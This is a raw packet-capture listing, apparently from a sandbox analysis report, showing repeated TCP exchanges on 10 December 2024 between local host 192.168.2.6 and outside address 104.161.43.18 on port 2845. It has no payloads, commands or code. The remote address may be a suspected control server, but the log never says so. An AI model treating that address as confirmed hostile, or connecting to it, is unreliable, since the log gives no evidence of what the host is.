                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.930008888 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.930107117 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.930125952 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.931065083 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.931108952 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.931174994 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.932094097 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.932162046 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.932183981 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.933135033 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.933171988 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.933199883 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.934146881 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.934196949 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.934293032 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.935218096 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.935256004 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.935286045 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.936199903 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.936253071 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.936306000 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.937252045 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.937367916 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.937407017 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.938237906 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.938282013 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.938330889 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.939304113 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.939405918 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.939446926 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.940332890 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.940372944 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.940386057 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.941384077 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.941472054 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.941529989 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.942404985 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.942445993 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.942475080 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.943440914 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.943476915 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.943487883 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.944402933 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.944488049 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.944519043 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.945458889 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.945503950 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.945545912 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.946472883 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.946516037 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.946564913 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.947494984 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.947534084 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.947669983 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.948544025 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.948658943 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.948728085 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.949569941 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.949620008 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.949690104 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.950587988 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.950639963 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.950699091 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.951632977 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.951675892 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.951755047 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.952639103 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.952750921 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.952773094 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.953706026 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.953754902 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.953785896 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.954682112 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.954724073 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.954767942 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.955832958 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.955862045 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.955881119 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.956262112 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.956343889 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.956440926 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.957305908 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.957341909 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.957405090 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.958336115 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.958384037 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.958412886 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.959366083 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.959515095 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.097712994 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.097834110 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.097896099 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.098030090 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.098084927 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.098161936 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.100078106 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.100163937 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.100177050 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.100203991 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.100397110 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.100440025 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.101170063 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.101239920 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.101279974 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.102236032 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.102550983 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.102770090 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.103244066 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.103404999 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.103440046 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.104284048 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.104322910 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.104360104 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.105247021 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.105312109 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.105458975 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.106277943 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.106491089 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.106525898 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.107578039 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.107786894 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.107950926 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.108297110 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.108452082 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.108488083 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.109395027 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.109656096 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.109767914 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.110379934 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.110575914 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.110646963 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.111375093 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.111439943 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.111542940 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.112395048 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.112523079 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.112560987 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.113408089 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.113535881 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.113583088 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.114440918 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.114576101 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.114620924 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.115477085 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.115585089 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.115623951 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.116508007 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.116590023 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.117157936 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.117614985 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.117701054 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.117729902 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.118554115 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.118686914 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.118896008 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.119617939 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.119770050 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.119805098 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.120775938 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.120888948 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.120935917 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.121711969 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.121798992 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.121845007 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.122694969 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.122865915 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.122914076 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.123697042 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.123822927 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.123864889 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.124771118 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.124831915 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.124869108 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.125786066 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.125912905 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.125952959 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.126852036 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.126919985 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.126957893 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.127836943 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.127981901 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.128026962 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.129014969 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.129087925 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.129131079 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.129892111 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.130055904 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.130090952 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.130959034 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.131027937 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.131062984 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.132011890 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.132265091 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.132306099 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.132970095 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.133074999 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.133116007 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.134258032 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.134314060 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.134351015 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.135040998 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.135180950 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.135220051 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.136104107 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.136143923 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.136188984 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.137267113 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.137336016 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.137373924 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.138124943 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.138214111 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.138251066 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.139130116 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.139233112 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.139270067 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.140212059 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.140285015 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.140324116 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.141237974 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.141361952 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.141401052 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.142257929 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.142455101 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.142496109 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.143261909 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.143361092 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.143398046 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.144335985 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.144392014 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.144431114 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.145318031 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.145381927 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.145421982 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.146657944 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.146749973 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.146795988 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.147744894 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.147841930 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.147881031 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.148621082 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.148741007 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.148785114 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.149702072 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.149744987 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.149791956 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.150471926 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.150548935 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.150592089 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.151496887 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.151789904 CET499082845192.168.2.6104.161.43.18
